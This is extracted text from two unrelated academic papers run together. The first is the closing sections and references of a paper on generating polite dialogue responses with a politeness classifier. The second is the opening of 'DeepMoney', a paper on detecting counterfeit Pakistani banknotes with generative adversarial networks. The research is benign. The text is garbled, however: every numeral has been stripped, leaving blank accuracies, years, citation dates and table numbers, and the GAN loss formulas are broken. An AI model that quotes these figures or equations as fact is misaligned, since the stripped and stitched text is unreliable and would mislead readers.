that flask belong to this man ? . oh , well , excuse me all to hell . . table : analysis of politeness classifier: sampled re- sponses from movietriples dialogue corpus (without cherry-picking) and their politeness score. the double line separates polite and rude classified responses. tain comparable quality with improved politeness over the base model (seq seq). for the retrieval models, we again see that their politeness levels are better than lft and rl models, but with a corre- sponding loss in dialogue quality. analysis . analysis of politeness classifier we start our analysis by providing qualitative exam- ples of how well our politeness classifier performs on the target sequences from movietriples train dataset. this is important to check because the clas- sifier is trained on wikipedia (wiki) admin request messages, and while our lstm-cnn performs bet- input x: for what ? y: for forcing me to face my life honestly for the first time . retrieval x: what ’s the c . w . for ? generic- x: thanks for the answer . s s x: that ’s not true . fusion x: i do n’t know . i mean , it ’s just a feeling , but that ’s not what i ’m saying . lft x: you ’ll be fine . rl x: i wish i could . input x: no, but i wanted to. y: are you a total lying , scumsucking pig , 〈person〉 ? retrieval x: so 〈person〉 , what did it total out at ? generic- x: no problem . s s x: oh , that ’s ridiculous . fusion x: well , you ’re not a little funny . lft x: i do n’t think so , sir . rl x: you ’re hurting me ! input x: you ’re sweet to say so . y: pretty song . retrieval x: is there a song you do n’t know ? generic- x: can you clarify ? s s x: 〈person〉 , i know . fusion x: you ’re a good man . lft x: i love this song . rl x: you sound like a goddess . input x: i find it hard to believe myself . y: his lips , unused as they are to such a contortion , twisted and stretched . into a smile . retrieval x: thank you . and always smile . generic- x: nice . s s x: how can you be so sure ? fusion x: you ’re a good man , mr . lft x: your lips are well . rl x: your lips are so beautiful . table : output dialogue response examples by retrieval, generic- , seq seq (denoted as s s) and the genera- tive polite models fusion, lft, and rl (shows conversa- tion history turns of x and y, and then the generated rd turn response by x). ter on cross-domain stack exchange (se) data, the movietriples dialogue corpus is still quite differ- ent and diverse in domain from both wiki and se. hence, it is important to have a reasonably accurate politeness classifier such that it can provide useful labels and rewards for our polite-dialogue models. table presents some randomly-selected (i.e., non- cherry-picked) responses from movietriples and their politeness classifier scores. we can see that the classifier provides a reasonably correct score a majority of the time, capturing several psycholin- guistic politeness strategies mentioned in danescu- i am sorry i really am sorry , . yes sir i will take care of it . you are a smart looking guy . figure : saliency heatmaps of the classifier’s attention (reward for sampled responses in polite-rl model). niculescu-mizil et al. ( ), e.g., positive ones such as gratitude, deference, greeting, positive lexi- con, indirection, indicative modal, and negative ones such as negative lexicon, direct question, direct start, nd person start. however, it does occasionally give strongly polite or rude scores to some mild or neu- tral responses, e.g., “they were in a car accident”, showing scope for classifier improvements. . output examples of stylistic dialogue next, we show some output examples of our polite dialogue models w.r.t. the base seq seq model as well as the retrieval-based models. we use these ex- amples to demonstrate the politeness strategies our proposed generative models have learned (in ta- ble ). in the first example, our stylistic models use politeness strategies such as indirection, pos- itive lexicon and counterfactual modal (danescu- niculescu-mizil et al., ). this example also illustrates the behavior of the retrieval model, i.e., most of the time it just outputs an utterance that has word overlap with but totally irrelevant to the con- text. thus although all its retrieved responses have oracle-level fluency and grammaticality, its average dialogue quality score in the human evaluation is still not as good as that of seq seq. in the second example, fusion uses indirection, while lft is being polite even when disagreeing with the abusive language from y . this example also shows that generic- , due to its limited space for retrieval, oftentimes fails to provide a relevant answer, although it is the most polite one since its candidate responses are manually picked. in the third example, fusion and lft both use positive lex- icon, and rl makes a compliment. in the fourth ex- ample, each of the three proposed models uses pos- itive lexicon. it is worth noting that in the last ex- ample, while lft and polite-rl seem to provide a relevant compliment, they are actually compliment- ing the wrong person. this kind of issue motivates us toward creating persona-based (li et al., c) politeness models for future work. . visualization of polite-rl reward using derivative saliency (simonyan et al., ; li et al., a; aubakirova and bansal, ), we also visualize how much each token in the sampled re- sponse contributes to the classifier’s reward during polite-rl model’s training. fig. shows three such heatmaps that correspond to the magnitudes of the derivative in absolute value with respect to each di- mension. the figures clearly show that the classifier has learned to identify multiple politeness strategies, e.g., “smart” (deference), “sir” (polite address), and the two “sorry”s (apologizing). conclusion and future work we first presented three diverse generative mod- els that can generate rich polite-to-rude spectrum dialogue responses (based on the politeness theo- ries by brown and levinson ( )), without us- ing any parallel data (which is usually assumed for tasks such as machine translation) and only relying on a style classifier. via multiple human evalua- tion studies and automatic metrics, we demonstrated that all three models generate more polite responses (displaying several politeness strategies discussed in previous psycholinguistic works), while lft and polite-rl are able to do so without losing dialogue quality, as opposed to the fusion model as well as the two retrieval-based models. in future work, there is still much room for im- provement on the politeness as well as dialogue quality side, and one could employ more recent, ad- vanced models such as variational, adversarial, and decoder-regulation techniques. though we focused on politeness for the scope of this paper, our models can be easily generalized to other emotion and personality styles (only relying on a style classifier), hopefully contributing towards the valuable paradigm of human-like and engaging intelligent tutors and personal assistants. in future work, our polite-rl model could also be extended to stylistic task-based dialogue generation, where both content preservation and style transfer are needed, potentially by disentangling politeness and content of the generated response and then only feeding the politeness portion to the classifier for rl training. acknowledgments we thank the action editor and the anonymous re- viewers for their helpful comments and discussions. this work was supported by darpa (yfa - d ap ), facebook parlai research award, google faculty research award, bloomberg data science research grant, and nvidia gpu awards. the views, opinions, and/or findings contained in this article are those of the authors and should not be interpreted as representing the official views or policies, either expressed or implied, of the funding agency. references david ameixa, luisa coheur, pedro fialho, and paulo quaresma. . luke, i am your father: dealing with out-of-domain requests by using movies subti- tles. in international conference on intelligent virtual agents, pages – . springer. ron artstein and massimo poesio. . inter-coder agreement for computational linguistics. computa- tional linguistics, ( ): – . malika aubakirova and mohit bansal. . interpret- ing neural networks to improve politeness compre- hension. in proceedings of the conference on empirical methods in natural language processing, pages – . dzmitry bahdanau, kyunghyun cho, and yoshua ben- gio. . neural machine translation by jointly learning to align and translate. in proceedings of in- ternational conference on learning representations, pages – . penelope brown and stephen c. levinson. . polite- ness: some universals in language usage, volume . cambridge university press. michael buhrmester, tracy kwang, and samuel d. gosling. . amazon’s mechanical turk: a new source of inexpensive, yet high-quality, data? per- spectives on psychological science, ( ): – . jacob cohen. . weighted kappa: nominal scale agreement provision for scaled disagreement or partial credit. psychological bulletin, ( ): – . ronan collobert, jason weston, léon bottou, michael karlen, koray kavukcuoglu, and pavel kuksa. . natural language processing (almost) from scratch. journal of machine learning research, (aug): – . cristian danescu-niculescu-mizil, moritz sudhof, dan jurafsky, jure leskovec, and christopher potts. . a computational approach to politeness with appli- cation to social factors. in proceedings of the st annual meeting of the association for computational linguistics, pages – . daxiang dong, hua wu, wei he, dianhai yu, and haifeng wang. . multi-task learning for multi- ple language translation. in proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing (volume : long pa- pers), pages – . bradley efron and robert j. tibshirani. . an intro- duction to the bootstrap. crc press. jessica ficler and yoav goldberg. . controlling linguistic style aspects in neural language generation. in proceedings of the workshop on stylistic variation, pages – . zhenxin fu, xiaoye tan, nanyun peng, dongyan zhao, and rui yan. . style transfer in text: exploration and evaluation. in proceedings of the thirty-second aaai conference on artificial intelligence (aaai- ), pages – . michel galley, chris brockett, alessandro sordoni, yangfeng ji, michael auli, chris quirk, margaret mitchell, jianfeng gao, and bill dolan. . deltableu: a discriminative metric for generation tasks with intrinsically diverse targets. in proceed- ings of the rd annual meeting of the association for computational linguistics and the th interna- tional joint conference on natural language process- ing (short papers), pages – . leon a. gatys, alexander s. ecker, and matthias bethge. . image style transfer using convolutional neu- ral networks. in proceedings of the ieee conference on computer vision and pattern recognition, pages – . sayan ghosh, mathieu chollet, eugene laksana, louis- philippe morency, and stefan scherer. . affect- lm: a neural language model for customizable affec- tive text generation. in proceedings of the th annual meeting of the association for computational linguis- tics (volume : long papers), pages – . xavier glorot and yoshua bengio. . understanding the difficulty of training deep feedforward neural net- works. in proceedings of the international conference on artificial intelligence and statistics (aistats’ ). society for artificial intelligence and statistics, pages – . sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . zhiting hu, zichao yang, xiaodan liang, ruslan salakhutdinov, and eric p. xing. . toward controlled generation of text. in proceedings of the th international conference on machine learning, pmlr , pages – . lawrence r. james, robert g. demaree, and gerrit wolf. . estimating within-group interrater reliability with and without response bias. journal of applied psychology, ( ): . harsh jhamtani, varun gangal, eduard hovy, and eric nyberg. . shakespearizing modern language us- ing copy-enriched sequence-to-sequence models. in proceedings of the workshop on stylistic variation, pages – . melvin johnson, mike schuster, quoc v. le, maxim krikun, yonghui wu, zhifeng chen, nikhil thorat, fernanda viégas, martin wattenberg, greg corrado, macduff hughes, and jeffrey dean. . google’s multilingual neural machine translation system: en- abling zero-shot translation. transactions of the asso- ciation for computational linguistics, v. , pages – . rafal jozefowicz, oriol vinyals, mike schuster, noam shazeer, and yonghui wu. . exploring the limits of language modeling. corr abs/ . . yuta kikuchi, graham neubig, ryohei sasano, hiroya takamura, and manabu okumura. . controlling output length in neural encoder-decoders. in proceed- ings of the conference on empirical methods in natural language processing, pages – . taeksoo kim, moonsu cha, hyunsoo kim, jungkwon lee, and jiwon kim. . learning to discover cross-domain relations with generative adversarial net- works. in proceedings of the th international con- ference on machine learning, pages – . diederik kingma and jimmy ba. . adam: a method for stochastic optimization. in proceedings of international conference on learning representa- tions. catherine kobus, josep crego, and jean senellart. . domain control for neural machine translation. in proceedings of recent advances in natural language processing, pages – . j. richard landis and gary g. koch. . the mea- surement of observer agreement for categorical data. biometrics, pages – . jiwei li, xinlei chen, eduard hovy, and dan jurafsky. a. visualizing and understanding neural models in nlp. in proceedings of north american chapter of the association for computational linguistics-hlt, pages – . jiwei li, michel galley, chris brockett, jianfeng gao, and bill dolan. b. a diversity-promoting objec- tive function for neural conversation models. in pro- ceedings of north american chapter of the associa- tion for computational linguistics-hlt, pages – . jiwei li, michel galley, chris brockett, jianfeng gao, and bill dolan. c. a persona-based neural con- versation model. in proceedings of the th annual meeting of the association for computational linguis- tics, pages – . rensis likert. . a technique for the measurement of attitudes. archives of psychology. ming-yu liu and oncel tuzel. . coupled genera- tive adversarial networks. in advances in neural in- formation processing systems, pages – . chia-wei liu, ryan lowe, iulian v. serban, michael noseworthy, laurent charlin, and joelle pineau. . how not to evaluate your dialogue system: an empirical study of unsupervised evaluation metrics for dialogue response generation. in proceedings of the conference on empirical methods in natural language processing, pages – . ming-yu liu, thomas breuel, and jan kautz. . unsupervised image-to-image translation networks. in proceedings of the conference on empiri- cal methods in natural language processing, pages – . ryan lowe, nissan pow, iulian v. serban, and joelle pineau. . the ubuntu dialogue corpus: a large dataset for research in unstructured multi-turn di- alogue systems. in proceedings of the th annual meeting of the special interest group on discourse and dialogue (sigdial ), pages – . ryan lowe, michael noseworthy, iulian v. serban, nicolas angelard-gontier, yoshua bengio, and joelle pineau. . towards an automatic turing test: learning to evaluate dialogue responses. in proceed- ings of the th annual meeting of the association for computational linguistics, pages – . yi luan, chris brockett, bill dolan, jianfeng gao, and michel galley. . multi-task learning for speaker- role adaptation in neural conversation models. in pro- ceedings of the th international joint conference on natural language processing, pages – . minh-thang luong, quoc v. le, ilya sutskever, oriol vinyals, and lukasz kaiser. . multi-task se- quence to sequence learning. in proceedings of in- ternational conference on learning representations. françois mairesse and marilyn walker. . person- age: personality generation for dialogue. in proceed- ings of the th annual meeting of the association of computational linguistics, pages – . tomas mikolov, kai chen, greg corrado, and jeffrey dean. . efficient estimation of word representa- tions in vector space. in proceedings of international conference on learning representations workshop. jonas mueller, david gifford, and tommi jaakkola. . sequence to better sequence: continuous revi- sion of combinatorial structures. in international con- ference on machine learning, pages – . eric w. noreen. . computer-intensive methods for testing hypotheses. wiley new york. kishore papineni, salim roukos, todd ward, and wei- jing zhu. . bleu: a method for automatic evaluation of machine translation. in proceedings of the th annual meeting on association for computa- tional linguistics, pages – . romain paulus, caiming xiong, and richard socher. . a deep reinforced model for abstractive sum- marization. in proceedings of international confer- ence on learning representations. juan ramos. . using tf-idf to determine word relevance in document queries. in proceedings of the first instructional conference on machine learning, volume , pages – . marc’aurelio ranzato, sumit chopra, michael auli, and wojciech zaremba. . sequence level training with recurrent neural networks. in proceedings of in- ternational conference on learning representations. steven j rennie, etienne marcheret, youssef mroueh, jarret ross, and vaibhava goel. . self-critical sequence training for image captioning. in ieee conference on computer vision and pattern recogni- tion, page . alan ritter, colin cherry, and william b. dolan. . data-driven response generation in social media. in proceedings of the conference on empirical methods in natural language processing, pages – . mike schuster and kuldip k paliwal. . bidirec- tional recurrent neural networks. ieee transactions on signal processing, ( ): – . rico sennrich, barry haddow, and alexandra birch. a. controlling politeness in neural machine trans- lation via side constraints. in proceedings of north american chapter of the association for computa- tional linguistics, pages – . rico sennrich, barry haddow, and alexandra birch. b. improving neural machine translation mod- els with monolingual data. in proceedings of the th annual meeting of the association for computational linguistics, pages – . iulian vlad serban, alessandro sordoni, yoshua bengio, aaron c. courville, and joelle pineau. . build- ing end-to-end dialogue systems using generative hier- archical neural network models. in the thirtieth aaai conference on artificial intelligence (aaai- ), pages – . yuanlong shao, stephan gouws, denny britz, anna goldie, brian strope, and ray kurzweil. . gen- erating high-quality and informative conversation re- sponses with sequence-to-sequence models. in pro- ceedings of the conference on empirical meth- ods in natural language processing, pages – . tianxiao shen, tao lei, regina barzilay, and tommi jaakkola. . style transfer from non-parallel text by cross-alignment. in advances in neural informa- tion processing systems, pages – . karen simonyan, andrea vedaldi, and andrew zisser- man. . deep inside convolutional networks: visualising image classification models and saliency maps. arxiv preprint arxiv: . . georgios p. spithourakis, isabelle augenstein, and se- bastian riedel. . numerically grounded language models for semantic error correction. in proceedings of the conference on empirical methods in nat- ural language processing, pages – . richard s. sutton, david mcallester, satinder singh, and yishay mansour. . policy gradient methods for reinforcement learning with function approximation. in advances in neural information processing sys- tems , pages – . mit press. yaniv taigman, adam polyak, and lior wolf. . unsupervised cross-domain image generation. arxiv preprint arxiv: . . subhashini venugopalan, lisa anne hendricks, ray- mond j. mooney, and kate saenko. . improving lstm-based video description with linguistic knowl- edge mined from text. in proceedings of the conference on empirical methods in natural lan- guage processing, pages – . di wang, nebojsa jojic, chris brockett, and eric ny- berg. . steering output style and topic in neural response generation. in proceedings of the con- ference on empirical methods in natural language processing, pages – . bert weijters, elke cabooter, and niels schillewaert. . the effect of rating scale format on response styles: the number of response categories and re- sponse category labels. international journal of re- search in marketing, ( ): – . ronald j williams. . simple statistical gradient- following algorithms for connectionist reinforcement learning. in reinforcement learning, pages – . springer. wei xu, alan ritter, bill dolan, ralph grishman, and colin cherry. . paraphrasing for style. in proceedings of the th international conference on computational linguistics, pages – . hayahide yamagishi, shin kanouchi, takayuki sato, and mamoru komachi. . controlling the voice of a sentence in japanese-to-english neural machine trans- lation. in proceedings of the rd workshop on asian translation (wat ), pages – . zili yi, hao zhang, ping tan, and minglun gong. . dualgan: unsupervised dual learning for image-to- image translation. in proceedings of international conference on computer vision. tiancheng zhao, ran zhao, and maxine eskenazi. . learning discourse-level diversity for neural dialog models using conditional variational autoencoders. in proceedings of the th annual meeting of the associ- ation for computational linguistics (volume : long papers), pages – . chunting zhou, chonglin sun, zhiyuan liu, and francis lau. . a c-lstm neural network for text classi- fication. arxiv preprint arxiv: . . jun-yan zhu, taesung park, phillip isola, and alexei a. efros. . unpaired image-to-image translation us- ing cycle-consistent adversarial networks. in proceed- ings of international conference on computer vision. submitted november accepted july published september corresponding author toqeer ali, toqeer@iu.edu.sa academic editor diego amancio additional information and declarations can be found on page doi . /peerj-cs. copyright ali et al. distributed under creative commons cc-by . open access deepmoney: counterfeit money detection using generative adversarial networks toqeer ali , salman jan , ahmad alkhodre , mohammad nauman , muhammad amin and muhammad shoaib siddiqui faculty of computer and information systems, islamic university of madinah, madinah, saudi arabia malaysian institute of information technology, university kuala lumpur, kuala lumpur, malaysia faculty of computer and information systems, islamic university of madinah, madinah, saudi arabia computer science, fast-nuces, peshawar, pakistan abstract conventional paper currency and modern electronic currency are two important modes of transactions. in several parts of the world, conventional methodology has clear precedence over its electronic counterpart. however, the identification of forged currency paper notes is now becoming an increasingly crucial problem because of the new and improved tactics employed by counterfeiters. in this paper, a machine assisted system—dubbed deepmoney—is proposed which has been developed to discriminate fake notes from genuine ones. for this purpose, state-of-the-art models of machine learning called generative adversarial networks (gans) are employed. gans use unsupervised learning to train a model that can then be used to perform supervised predictions. this flexibility provides the best of both worlds by allowing unlabelled data to be trained on whilst still making concrete predictions. this technique was applied to pakistani banknotes. state-of-the-art image processing and feature recognition techniques were used to design the overall approach of a valid input. augmented samples of images were used in the experiments which show that a high-precision machine can be developed to recognize genuine paper money. an accuracy of % has been achieved. the code is available as an open source to allow others to reproduce and build upon the efforts already made. subjects data mining and machine learning, data science keywords deep learning, counterfeit money, generative adversarial networks introduction currency is a common system to perform transactions for trading or exchange of goods among people. various currencies are recognized for trading between nations in foreign exchange markets. the problem with paper currency is that it may be counterfeit. counterfeit is imitation money which is produced without the legal sanction of the state or government, considered as fraud (derrida, ). anti-counterfeiting measures can be adopted which involve the fine details of the raised intaglio printing on notes which allows non-experts to easily spot forgeries (tanaka, nishiyama & koyama, ). with advancement in technology, fakes and forgery rates are increasing. in , almost % of the $ million in counterfeit currency circulating in the u.s was made using how to cite this article ali t, jan s, alkhodre a, nauman m, amin m, siddiqui ms. . deepmoney: counterfeit money detection us- ing generative adversarial networks. peerj comput. sci. :e http://doi.org/ . /peerj-cs. mailto:toqeer@iu.edu.sa https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. digital printing technologies (murakami-fester, ; bartkiewicz et al., ). as reported by bloomberg news, a -year-old hairstylist forged up to $ , in counterfeit notes (magdaleno, ). another research carried out by gallup in pakistan found out that more than a quarter of the population ( %) have received counterfeit money while buying items from the market. elsewhere, a raid by peshawar police yielded fake documents and . million in counterfeit currency notes. the chairman and managing director of a security printing corporation in pakistan said that enemy countries were producing counterfeit notes of pakistani rupee which was being used exclusively for terrorist activities in the country (shoaib et al., ; taillard, ). the state bank of pakistan has carried out various types of campaigns to raise awareness of the security features of bank notes, both directly to its customers and in collaboration with other banks. bank’s efforts to raise awareness amongst the general public involve a media campaign and a mobile application that detects counterfeit notes. the awareness of the security features of bank notes in public may help some people identify counterfeit notes; however, most of the public, especially people who are illiterate, are not able to differentiate between a forged currency note and a genuine one. also, these features are hard to recognized by human eye or touch when the currency notes are old, dirty, and damaged. to solve the issues in classifying a currency note as a fake or a genuine note, we have proposed a machine assisted system named deepmoney. for discriminating fake notes from genuine ones, state-of-the-art models of machine learning called generative adversarial networks (gans) are employed. gans use an unsupervised learning to train a model that can then be used to perform supervised predictions. this flexibility provides the best of both worlds by allowing unlabelled data to be trained on whilst still making concrete predictions. this technique is applied to pakistani banknotes. state-of-the-art image processing and feature recognition techniques were used to design the overall approach of a valid input. the rest of paper is organized as follows. ‘related work’ discusses the related work and provides details of various deep learning models in the subject domain. ‘proposed solution’ provides details of the proposed solution and how the dataset was developed. ‘results’ presents the results and evaluation details of employing models on the dataset. the paper is concluded in ‘conclusion’. related work bearing the aforementioned issues in mind, a number of research solutions have been provided in the past to check the validity of the banknotes (thakur & kaur, ; mirza & nanda, a; chakraborty et al., ; prasanthi & setty, ; kang & lee, ). mirza & nanda ( b) offered a solution for a currency verification system using image processing based on the extraction of characteristics. the solution was applied to indian banknotes. the edge detection and image segmentation were used to make a comparison between the original and the counterfeit notes. snehlata et al. presented a uml activity model designed to represent the dynamic aspects for identification of fake currency for rs currency note for indian rupee. they have used class descriptions for real and fake images of the currency for security threads in the ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. form of strips and apply comparison of block pixels to identify fake and real currency (snehlata & saxena, ). singh et al. have presented an image processing-based approach for detecting forged indian currency. the authors have utilized security thread and latent image, embedded on the note to identify forgery. first the security features are extracted and encoded, then a clustering algorithm, k-means is applied for classification. then the latent image, segmented via template matching is encoded using hog descriptor and classified with an svm model to predict if the note is fake or real singh, ozarde & abhiram ( ). abburu et al. ( ) proposed a system for automated currency recognition using image processing techniques for accurately identifying both the country of origin and the denomination of a given banknote. however, they do not discriminate between a fake and a real currency note. however, the deepmoney solution proposed here does not use image processing and differs in many ways. ross et al. ( ) have proposed a database for detecting counterfeit items using digital fingerprint records which can be used for detecting counterfeit currency note. it takes an image of the authentication region and creates a digital fingerprint of the object. it uses signal processing techniques, such as, fft of the image to create the digital fingerprint to extract features which are used to compare the fake and real objects. kayani presents a bank note processing system based on florescence and phosphorescence detection (kayani, ). the illumination source is used to direct light on a note and the sensors measures the florescence and phosphorescence that are used to identify if the note is fake or real. micali & devadas ( ) proposed a solution for counterfeit prevention using physically unclonable value for unique identification for each currency note. phillips has presented a miniature counterfeit detector in his patent (phillips, ). it applies multiple test to assure the authenticity of a currency note. back light illuminators are used for visual inspection of the watermarks, florescent and anti-counterfeiting features. sensors, such as, magnetic ink sensor, are used to detect the magnetic ink based security features on the note. however, some of the features are detected but with old notes the rate of false negative would be high. alicherry has given a digital signature based solution for verifying the authenticity of a currency note and tracking duplicate notes. a digital signature based on the serial number of the currency note is attached to the currency note and people can query the authenticity of the note by sending a photograph of the note to a centralized server for verification and tracking alicherry ( ). before gans (goodfellow et al., ), a neural network approach was used to authenticate banknotes (mohamad et al., ). in this research, generative models to train a neural network are preferred. python has also been used to develop and implement a framework for the identification of pakistani currency. berenguel et al. ( ) also worked on methods by which to identify genuine and photocopied bank notes. the technique applied was to differentiate the texture between the original and photocopied notes. other studies choi et al. ( ) also worked on the detection of counterfeit banknotes by using optical coherence tomography (oct). ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. to differentiate between genuine and counterfeit notes, the researchers used a three- dimensional imaging security feature according to the ff-oct system. their results show that it is possible to recognize original notes with the deepmoney technique. however, their technique was based on a particular feature of specific banknotes which may prove to be less effective on other notes. this also differs from the deepmoney perspective of recognizing banknotes. table elaborates some recent research work regarding counterfeit money. there have been a few solutions provided which use machine learning techniques. for example, hassanpour & farahabadi ( ) used hidden markov models for the recognition of banknotes. in the following subsection, we discuss some of the deep learning model that could be utilized in the field of identifying currency forgery and counterfeit currency. deep learning models some of the best known deep learning models in comparison to our proposed gans model on the grounds for selecting the one which will offer the most robust results, are discussed in the following subsections. recurrent neural networks a number of techniques exist in traditional machine learning and deep learning which allow patterns in sequences and contents to be learned. a recurrent neural network is one such technique. context sensitive and inherently ordered data is used in this network. the network can operate with both audio and text input. recurrent neural networks are adept at handling arbitrary length sequence data. this network is a powerful tool which requires the sequence to be contextual. recurrent neural networks are still very dominant although, in the past, they were very hard to train. however, there is now a solution, hessian-free optimization, which offers the ability to train recurrent neural networks. the model is depicted in fig. . fully connected neural networks as its name indicates, a fully connected neural network is one in which all the neurons are connected to the next layer of neurons. there are many layers such as the max pooling and the convolutional layers. the high level perception in these networks uses only one type of layer and these layers are fully connected. these connected layers in the neurons link to all the activations in the previous layers. the activation function may also be calculated by the multiplication of a matrix trailed by a network’s set, also known as bias. a fully connected neural network has an input layer, a hidden layer and an output layer as depicted in fig. . convolutional neural network this type of neural network processes the dimensioned and order data in different ways. convolutional neural networks (krizhevsky, sutskever & hinton, ) are learned through the same method as the stochastic gradient descent method traditionally learns. the following are the convolutional neural network layers: ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table related work done in the recent years in the field of counterfeit currency detection. authors objective method limitations year thakur & kaur ( ) review of fake currency detection techniques survey paper not applicable chakraborty et al. ( ) recent developments in paper currency recognition system survey paper not applicable prasanthi & setty ( ) indian paper currency authentication system image processing performance is less than machine learning based systems kang & lee ( ) fake banknote detection multispectral imaging sensors feature extraction and classifica- tion require high computation mirza & nanda ( a) currency verification image processing: edge detection and image segmentation only for indian notes snehlata & saxena ( ) fake currency identification uml activity model using class descriptors only for rs note of indian currency singh, ozarde & abhiram ( ) detecting forged indian currency image processing, k-means clustering and svm as a classifier limited to rs note of indian currency abburu et al. ( ) automated currency recognition for identifying country of origin and denomination image processing cannot detect counterfeit or forgery ross et al. ( ) database for detecting counterfeit items digital fingerprint records using images of security features performance is less than ma- chine learning based systems kayani ( ) bank note processing system florescence and phosphores- cence detection many security features are not detectable using florescence and phosphorescence detection micali & devadas ( ) counterfeit prevention physically unclonable value for unique identification for each currency note needs internet connection for sending images to centralized server phillips ( ) miniature counterfeit detector back light illuminators are used for visual inspection of the watermarks, florescent and anti- counterfeiting features many security features are not detectable using florescence and phosphorescence detection alicherry ( ) verifying the authenticity of a currency note and tracking duplicate notes digital signature based on the serial number of the currency note needs internet connection for sending images to centralized server berenguel et al. ( ) identify genuine bank notes differentiate the texture between the original and photocopied notes using oft accuracy is less than machine learning based systems choi et al. ( ) counterfeit detection characterization of safety fea- ture on banknote with full-field optical coherence tomography accuracy is less than machine learning based systems hassanpour & farahabadi ( ) paper currency recognition machine learning: hidden markov models accuracy is less than the proposed system mohamad et al. ( ) banknote authentication srtificial neural network accuracy is less than the proposed system convolutional in this layer there is a grid of neurons. commonly, this grid is rectangular which requires that the previous layer should also take the form of the same rectangular shaped grid. in the convolutional layer, the neurons have the same weight. each neuron takes the input from the rectangular section with the input coming from the previous layer. ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure a recurrent neural network. full-size doi: . /peerjcs. /fig- figure a fully connected neural network. full-size doi: . /peerjcs. /fig- max-pooling pooling layers are present after each convolutional layer. the layer usually grabs tiny rectangular blocks from the convolutional layer and then samples them so that only one output is created. pooling can be achieved in many ways such as by taking an average or by learning patterns and combinations, for example learning linear associations or the combination of neurons in that small block. autoencoder there are many machine learning models but auto-encoder are fairly basic models. they come from a family of neural networks for which the input is same as the output. auto-encoders compress the latent space representation and then reconstruct the output from the representation. auto-encoders are used for unsupervised learnings and so are an artificial network. the learning of encoders are efficient enough. today, auto-encoders are an emerging field of research in numerous areas, such as anomaly detection. ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure deep belief networks. full-size doi: . /peerjcs. /fig- deep belief networks deep belief networks (lee et al., ) consist of layers of variables, both latent as well as stochastic. latent variables are usually composed of values that are binary and known as feature detectors. there are many layers in this network. the top layers consist of connections that are undirected which allows them to form a kind of associative memory. on the other hand, the lower layers are directed links from any previous or top layer. a lower layer represents a data vector. an example of deep belief networks is depicted in fig. : long short-term memory the connected neural network, also called the recurrent neural network, works but, when applied on different models, it suffers from two problems. firstly, it produces a vanishing gradient and, secondly, it is an exploding gradient. ltsm (long short term memory) was invented to solve these issues by introducing a memory unit, which is called a cell, into the network. the cell is used as storage or memory that basically remembers a value for long or possibly short time periods (hochreiter & schmidhuber, ; sak, senior & beaufays, ; warrington & baddeley, ). lstm are represented in fig. . problem statement the existing solutions only work to detect the security features of the notes and at present this is the only viable solution used to tackle this issue. forged notes are not detectable by the naked eye and this results in financial loss to the general public. degraded bank notes are also in circulation which may result in usage problems. the solution given in this paper is based on generative adversarial networks (gans) (goodfellow et al., ) that use generative and discriminative models for the recognition of real and counterfeit currency notes. to the best of our knowledge, this is first research being done to detect forged money using gans. we trained the discriminative model with pakistani rupee notes while the ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure long short-term memory. full-size doi: . /peerjcs. /fig- generative model g was used to input the counterfeit notes to classify with discriminative model d. the objectives of the studies is twofold: . to build a dataset of real and counterfeit pakistani currency which is not available at present in the public domain; . to present, design, and implement deepmoney, a method to differentiate counterfeit notes from genuine bank notes. proposed solution in this section, the proposed solution is elaborated and details are provided as to how generative adversarial networks cope with real and fake data. generative adversarial networks a very new and effective generative model is utilized for generative counterfeit samples and for recognizing original data items from the generative ones, known as generative adversarial networks (gans) (goodfellow et al., ; goodfellow et al., ; radford, metz & chintala, ; salimans et al., ). gans can differentiate with maximum accuracy between the fake and real banknotes. gans are quite interesting phenomena of neural networks that work on two modules. one is called the generative network and the second is known as the discriminator network. quite promising results have been achieved after employing gans on the dataset and then subsequently used to classify the real and fake notes. the proposed model is depicted in fig. wherein the discriminator neural network (d) is trained by providing data from training set (original distribution) and generated data (after perturbation i.e., adding noise from the latent space). the loss functions are updated during training process of each discriminator’s network and the generator network (g). after training is completed, the model is able to classify real and fake currency notes with accuracy of percent. in gans, the discriminator part works as a classifier for recognizing the images. however, in the learning process, both the generator and discriminator co-ordinate with each other. ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure deepmoney: proposed counterfeit model. full-size doi: . /peerjcs. /fig- a generated image is sent to the discriminator module to classify whether it is a fake or a real image. if it is recognizable, the discriminator will produce its output, if it is not, the module will send it back to the generator to regenerate the image. based on the feedback received, the generator improves its cast and creates the image. the process continues until both the models are optimal in correctly generating and classifying the same image. in the case of currency note identification, the basic idea is that there are two models as defined by gans. the generative model generates fake banknotes and the discriminative model d estimates the probability that whatever data is received from g, it is from training data or it is from generator g itself. to understand the generator’s distribution pg over data (a), a priori is defined on input noise variables pb(b), which then represents a mapping to the banknotes data space as g(b;θg ), where g is a differentiable function represented by a multilayer perceptron with parameters θg . according to gans networks, a second multilayer perceptron was also designed d(y;θd) that outputs a single scalar. d(a) represents the banknotes that came from the data, not from the generator. the discriminator d was trained with real banknotes to increase the probability of correctly recognizing the data(a) and the sample b was produced from the generative model g. the loss or energy function of generative model g can be represented mathematically as: m m∑ [log( −(d(g(b))))] and the loss function of the discriminator can be represented as: m m∑ [logd(a)+log( −(d(g(b))))] figure shows a complete flow of how our deepmoney process works. real images are given as input to the discriminator, while for training, communication is performed between the discriminator and the generator. ali et al. ( ), peerj comput. sci., doi . 